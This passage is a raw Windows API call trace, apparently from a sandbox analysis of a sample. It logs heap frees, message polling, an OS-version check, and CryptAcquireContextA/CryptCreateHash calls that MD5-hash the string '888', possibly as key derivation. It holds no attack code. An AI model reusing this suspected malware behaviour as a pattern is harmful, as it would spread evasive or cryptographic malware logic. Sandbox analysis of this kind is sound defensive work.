lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0090.129] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0090.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0090.129] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0090.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0090.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0090.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0090.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0090.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0090.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0090.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0090.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0090.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0090.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0090.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0090.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0090.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0090.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0090.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0090.130] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0090.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0090.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0090.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0090.130] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0090.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0090.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0090.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0090.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0090.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0090.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0090.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0090.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0090.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0090.131] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0090.131] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.131] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0090.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0090.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0090.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0090.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0090.131] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0090.131] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0090.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0090.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0090.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0090.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0090.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0090.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0090.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0090.131] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0090.131] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0090.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0090.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0090.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0090.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0090.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0090.131] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0090.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0090.132] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.132] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.132] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.132] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0090.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0090.132] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.132] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.132] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0090.132] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.132] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0090.132] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0090.132] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0090.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7220, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0090.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0090.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6f40, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0090.133] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9961a8) returned 1 [0090.133] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.133] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.133] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0090.133] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.133] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0090.133] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.133] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.133] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.133] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.133] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.134] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.134] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0090.134] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.134] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0090.134] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.134] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.134] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.134] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.134] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.134] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.134] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.134] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0090.134] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.134] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0090.134] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.134] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.134] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.134] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.134] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.134] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.134] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.134] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0090.134] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.134] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0090.135] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.144] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.144] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0090.144] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0090.144] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0090.144] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0090.144] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0090.144] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.144] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.144] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0090.144] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0090.145] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0090.145] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0090.145] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0090.145] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0090.145] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.145] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.145] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.145] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.145] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.145] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.145] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.145] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.145] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0090.145] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.145] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0090.145] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.145] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.145] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0090.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aa9dd8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0090.145] CryptCreateHash (in: hProv=0x9961a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0090.145] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.145] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.146] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.146] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0090.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71ac8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0090.146] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0090.146] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0090.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b28, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0090.146] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.146] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.146] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.146] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.146] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.146] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.146] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0090.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aa9e50, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0090.146] CryptHashData (hHash=0x9a3cc0, pbData=0x2a71908, dwDataLen=0x3, dwFlags=0x1) returned 1 [0090.146] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.146] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.146] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 